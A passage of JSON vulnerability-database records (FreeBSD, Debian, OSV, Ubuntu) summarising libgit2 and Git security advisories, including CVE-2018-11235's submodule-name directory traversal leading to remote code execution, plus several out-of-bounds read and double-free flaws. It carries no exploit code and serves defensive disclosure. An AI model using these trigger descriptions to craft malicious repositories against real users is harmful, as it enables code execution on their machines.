"MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10887", "CVE-2018-10888"], "modified": "2018-07-09T00:00:00", "id": "3C9B7698-84DA-11E8-8C75-D8CB8ABF62DD", "href": "https://vuxml.freebsd.org/freebsd/3c9b7698-84da-11e8-8c75-d8cb8abf62dd.html", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2022-01-19T15:51:31", "description": "\n\nThe Git community reports:\n\nInsufficient validation of submodule names\n\n\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-29T00:00:00", "type": "freebsd", "title": "Libgit2 -- Fixing insufficient validation of submodule names", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11235"], "modified": "2018-05-29T00:00:00", "id": "5A1589AD-68F9-11E8-83F5-D8CB8ABF62DD", "href": "https://vuxml.freebsd.org/freebsd/5a1589ad-68f9-11e8-83f5-d8cb8abf62dd.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-19T15:51:31", "description": "\n\nThe Git community reports:\n\nIn affected versions of Git, code to sanity-check pathnames on\n\t NTFS can result in reading out-of-bounds memory.\nIn affected versions of Git, remote code execution can\n\t occur. With a crafted .gitmodules file, a malicious project can\n\t execute an arbitrary script on a machine that runs \"git clone\n\t --recurse-submodules\" because submodule \"names\" are obtained from\n\t this file, and then appended to $GIT_DIR/modules, leading to\n\t directory traversal with \"../\" in a name. Finally, post-checkout\n\t hooks from a submodule are executed, bypassing the intended design\n\t in which hooks are not obtained from a remote server.\n\n\n\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-29T00:00:00", "type": "freebsd", "title": "Git -- Fix memory out-of-bounds and remote code execution vulnerabilities (CVE-2018-11233 and CVE-2018-11235)", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235"], "modified": "2018-05-29T00:00:00", "id": "C7A135F4-66A4-11E8-9E63-3085A9A47796", "href": "https://vuxml.freebsd.org/freebsd/c7a135f4-66a4-11e8-9e63-3085a9a47796.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2022-03-26T20:13:20", "description": "Package : libgit2\nVersion : 0.21.1-3+deb8u1\nCVE ID : CVE-2018-10887 CVE-2018-10888 CVE-2018-15501\n\n\nCVE-2018-15501\n A potential out-of-bounds read when processing a "ng" smart packet\n might lead to a Denial of Service.\n\nCVE-2018-10887\n A flaw has been discovered that may lead to an integer overflow which\n in turn leads to an out of bound read, allowing to read before the\n base object. This might be used to leak memory addresses or cause a\n Denial of Service.\n\nCVE-2018-10888\n A flaw may lead to an out-of-bound read while reading a binary delta\n file. This might result in a Denial of Service.\n\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n0.21.1-3+deb8u1.\n\nWe recommend that you upgrade your libgit2 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.2}, "published": "2018-08-25T21:27:14", "type": "debian", "title": "[SECURITY] [DLA 1477-1] libgit2 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10887", "CVE-2018-10888", "CVE-2018-15501"], "modified": "2018-08-25T21:27:14", "id": "DEBIAN:DLA-1477-1:EAB94", "href": "https://lists.debian.org/debian-lts-announce/2018/08/msg00024.html", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2021-11-29T22:33:35", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4212-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nMay 29, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : git\nCVE ID : CVE-2018-11235\n\nEtienne Stalmans discovered that git, a fast, scalable, distributed\nrevision control system, is prone to an arbitrary code execution\nvulnerability exploitable via specially crafted submodule names in a\n.gitmodules file.\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 1:2.1.4-2.1+deb8u6.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 1:2.11.0-3+deb9u3.\n\nWe recommend that you upgrade your git packages.\n\nFor the detailed security status of git please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/git\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-29T20:44:01", "type": "debian", "title": "[SECURITY] [DSA 4212-1] git security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11235"], "modified": "2018-05-29T20:44:01", "id": "DEBIAN:DSA-4212-1:9B5AE", "href": "https://lists.debian.org/debian-security-announce/2018/msg00140.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-21T18:52:45", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4212-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nMay 29, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : git\nCVE ID : CVE-2018-11235\n\nEtienne Stalmans discovered that git, a fast, scalable, distributed\nrevision control system, is prone to an arbitrary code execution\nvulnerability exploitable via specially crafted submodule names in a\n.gitmodules file.\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 1:2.1.4-2.1+deb8u6.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 1:2.11.0-3+deb9u3.\n\nWe recommend that you upgrade your git packages.\n\nFor the detailed security status of git please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/git\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-29T20:44:01", "type": "debian", "title": "[SECURITY] [DSA 4212-1] git security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11235"], "modified": "2018-05-29T20:44:01", "id": "DEBIAN:DSA-4212-1:81E13", "href": "https://lists.debian.org/debian-security-announce/2018/msg00140.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-04T02:18:12", "description": "- -------------------------------------------------------------------------\nDebian LTS Advisory DLA-2936-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ Utkarsh Gupta\nMarch 07, 2022 https://wiki.debian.org/LTS\n- -------------------------------------------------------------------------\n\nPackage : libgit2\nVersion : 0.25.1+really0.24.6-1+deb9u1\nCVE ID : CVE-2018-8098 CVE-2018-8099 CVE-2018-10887 CVE-2018-10888\n CVE-2018-15501 CVE-2020-12278 CVE-2020-12279\nDebian Bug : 892961 892962 903508 903509\n\nMultiple vulnerabilities were found in libgit2, a low-level Git library,\nand are as follows:\n\nCVE-2018-8098\n\n Integer overflow in the index.c:read_entry() function while\n decompressing a compressed prefix length in libgit2 before\n v0.26.2 allows an attacker to cause a denial of service\n (out-of-bounds read) via a crafted repository index file.\n\nCVE-2018-8099\n\n Incorrect returning of an error code in the index.c:read_entry()\n function leads to a double free in libgit2 before v0.26.2, which\n allows an attacker to cause a denial of service via a crafted\n repository index file.\n\nCVE-2018-10887\n\n It has been discovered that an unexpected sign extension in\n git_delta_apply function in delta-apply.c file may lead to an\n integer overflow which in turn leads to an out of bound read,\n allowing to read before the base object. An attacker may use\n this flaw to leak memory addresses or cause a Denial of Service.\n\nCVE-2018-10888\n\n A missing check in git_delta_apply function in delta-apply.c file,\n may lead to an out-of-bound read while reading a binary delta file.\n An attacker may use this flaw to cause a Denial of Service.\n\nCVE-2018-15501\n\n In ng_pkt in transports/smart_pkt.c in libgit2, a remote attacker\n can send a crafted smart-protocol "ng" packet that lacks a '\\0'\n byte to trigger an out-of-bounds read that leads to DoS.\n\nCVE-2020-12278\n\n path.c mishandles equivalent filenames that exist because of NTFS\n Alternate Data Streams. This may allow remote code execution when\n cloning a repository. This issue is similar to CVE-2019-1352.\n\nCVE-2020-12279\n\n checkout.c mishandles equivalent filenames that exist because of\n NTFS short names. This may allow remote code execution when cloning\n a repository. This issue is similar to CVE-2019-1353.\n\nFor Debian 9 stretch, these problems have been fixed in version\n0.25.1+really0.24.6-1+deb9u1.\n\nWe recommend that you upgrade your libgit2 packages.\n\nFor the detailed security status of libgit2 please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/libgit2\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-21T00:39:43", "type": "debian", "title": "[SECURITY] [DLA 2936-1] libgit2 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10887", "CVE-2018-10888", "CVE-2018-15501", "CVE-2018-8098", "CVE-2018-8099", "CVE-2019-1352", "CVE-2019-1353", "CVE-2020-12278", "CVE-2020-12279"], "modified": "2022-03-21T00:39:43", "id": "DEBIAN:DLA-2936-1:BE105", "href": "https://lists.debian.org/debian-lts-announce/2022/03/msg00031.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "osv": [{"lastseen": "2022-07-06T05:27:58", "description": "\n* [CVE-2018-15501](https://security-tracker.debian.org/tracker/CVE-2018-15501)\nA potential out-of-bounds read when processing a ng smart packet\n might lead to a Denial of Service.\n* [CVE-2018-10887](https://security-tracker.debian.org/tracker/CVE-2018-10887)\nA flaw has been discovered that may lead to an integer overflow which\n in turn leads to an out of bound read, allowing to read before the\n base object. This might be used to leak memory addresses or cause a\n Denial of Service.\n* [CVE-2018-10888](https://security-tracker.debian.org/tracker/CVE-2018-10888)\nA flaw may lead to an out-of-bound read while reading a binary delta\n file. This might result in a Denial of Service.\n\n\nFor Debian 8 Jessie, these problems have been fixed in version\n0.21.1-3+deb8u1.\n\n\nWe recommend that you upgrade your libgit2 packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.2}, "published": "2018-08-25T00:00:00", "type": "osv", "title": "libgit2 - security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10887", "CVE-2018-10888", "CVE-2018-15501"], "modified": "2022-07-06T00:11:28", "id": "OSV:DLA-1477-1", "href": "https://osv.dev/vulnerability/DLA-1477-1", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2022-07-06T05:02:33", "description": "\nEtienne Stalmans discovered that git, a fast, scalable, distributed\nrevision control system, is prone to an arbitrary code execution\nvulnerability exploitable via specially crafted submodule names in a\n.gitmodules file.\n\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 1:2.1.4-2.1+deb8u6.\n\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 1:2.11.0-3+deb9u3.\n\n\nWe recommend that you upgrade your git packages.\n\n\nFor the detailed security status of git please refer to its security\ntracker page at:\n<https://security-tracker.debian.org/tracker/git>\n\n\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-05-29T00:00:00", "type": "osv", "title": "git - security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11235"], "modified": "2022-07-06T03:10:41", "id": "OSV:DSA-4212-1", "href": "https://osv.dev/vulnerability/DSA-4212-1", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-06T05:18:58", "description": "\nMultiple vulnerabilities were found in libgit2, a low-level Git library,\nand are as follows:\n\n\n* [CVE-2018-8098](https://security-tracker.debian.org/tracker/CVE-2018-8098)\nInteger overflow in the index.c:read\\_entry() function while\n decompressing a compressed prefix length in libgit2 before\n v0.26.2 allows an attacker to cause a denial of service\n (out-of-bounds read) via a crafted repository index file.\n* [CVE-2018-8099](https://security-tracker.debian.org/tracker/CVE-2018-8099)\nIncorrect returning of an error code in the index.c:read\\_entry()\n function leads to a double free in libgit2 before v0.26.2, which\n allows an attacker to cause a denial of service via a crafted\n repository index file.\n* [CVE-2018-10887](https://security-tracker.debian.org/tracker/CVE-2018-10887)\nIt has been discovered that an unexpected sign extension in\n git\\_delta\\_apply function in delta-apply.c file may lead to an\n integer overflow which in turn leads to an out of bound read,\n allowing to read before the base object. An attacker may use\n this flaw to leak memory addresses or cause a Denial of Service.\n* [CVE-2018-10888](https://security-tracker.debian.org/tracker/CVE-2018-10888)\nA missing check in git\\_delta\\_apply function in delta-apply.c file,\n may lead to an out-of-bound read while reading a binary delta file.\n An attacker may use this flaw to cause a Denial of Service.\n* [CVE-2018-15501](https://security-tracker.debian.org/tracker/CVE-2018-15501)\nIn ng\\_pkt in transports/smart\\_pkt.c in libgit2, a remote attacker\n can send a crafted smart-protocol ng packet that lacks a '\\0'\n byte to trigger an out-of-bounds read that leads to DoS.\n* [CVE-2020-12278](https://security-tracker.debian.org/tracker/CVE-2020-12278)\npath.c mishandles equivalent filenames that exist because of NTFS\n Alternate Data Streams. This may allow remote code execution when\n cloning a repository. This issue is similar to [CVE-2019-1352](https://security-tracker.debian.org/tracker/CVE-2019-1352).\n* [CVE-2020-12279](https://security-tracker.debian.org/tracker/CVE-2020-12279)\ncheckout.c mishandles equivalent filenames that exist because of\n NTFS short names. This may allow remote code execution when cloning\n a repository. This issue is similar to [CVE-2019-1353](https://security-tracker.debian.org/tracker/CVE-2019-1353).\n\n\nFor Debian 9 stretch, these problems have been fixed in version\n0.25.1+really0.24.6-1+deb9u1.\n\n\nWe recommend that you upgrade your libgit2 packages.\n\n\nFor the detailed security status of libgit2 please refer to\nits security tracker page at:\n<https://security-tracker.debian.org/tracker/libgit2>\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-21T00:00:00", "type": "osv", "title": "libgit2 - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10887", "CVE-2018-10888", "CVE-2018-15501", "CVE-2018-8098", "CVE-2018-8099", "CVE-2019-1352", "CVE-2019-1353", "CVE-2020-12278", "CVE-2020-12279"], "modified": "2022-07-06T01:45:44", "id": "OSV:DLA-2936-1", "href": "https://osv.dev/vulnerability/DLA-2936-1", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2021-11-22T21:35:38", "description": "A flaw was found in libgit2 before version 0.27.3. A missing check in\ngit_delta_apply function in delta.c file, may lead to an out-of-bound read\nwhile reading a binary delta file. An attacker may use this flaw to cause a\nDenial of Service.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-07-10T00:00:00", "type": "ubuntucve", "title": "CVE-2018-10888", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10888"], "modified": "2018-07-10T00:00:00", "id": "UB:CVE-2018-10888", "href": "https://ubuntu.com/security/CVE-2018-10888", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-11-22T21:35:38", "description": "A flaw was found in libgit2 before version 0.27.3. It has been discovered\nthat an unexpected sign extension in git_delta_apply function in delta.c\nfile may lead to an integer overflow which in turn leads to an out of bound\nread, allowing to read before the base object. An attacker may use this\nflaw to leak memory addresses or cause a Denial of Service.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.2}, "published": "2018-07-10T00:00:00", "type": "ubuntucve", "title": "CVE-2018-10887", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10887"], "modified": "2018-07-10T00:00:00", "id": "UB:CVE-2018-10887", "href": "https://ubuntu.com/security/CVE-2018-10887", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2021-11-22T21:36:03", "description": "In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x\nbefore 2.16.4, and 2.17.x before 2.17.1, remote code execution can occur.\nWith a crafted .gitmodules file, a malicious project can execute an\narbitrary script on a machine that runs \"git clone --recurse-submodules\"\nbecause submodule \"names\" are obtained from this file, and then appended to\n$GIT_DIR/modules, leading to directory traversal with \"../\" in a name.\nFinally, post-checkout hooks from a submodule are executed, bypassing the\nintended design in which hooks are not obtained from a remote server.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-30T00:00:00", "type": "ubuntucve", "title": "CVE-2018-11235", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11235"], "modified": "2018-05-30T00:00:00", "id": "UB:CVE-2018-11235", "href": "https://ubuntu.com/security/CVE-2018-11235", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2022-07-04T06:00:13", "description": "A flaw was found in libgit2 before version 0.27.3. A missing check in git_delta_apply function in delta.c file, may lead to an out-of-bound read while reading a binary delta file. An attacker may use this flaw to cause a Denial of Service.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2018-07-10T14:29:00", "type": "debiancve", "title": "CVE-2018-10888", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": 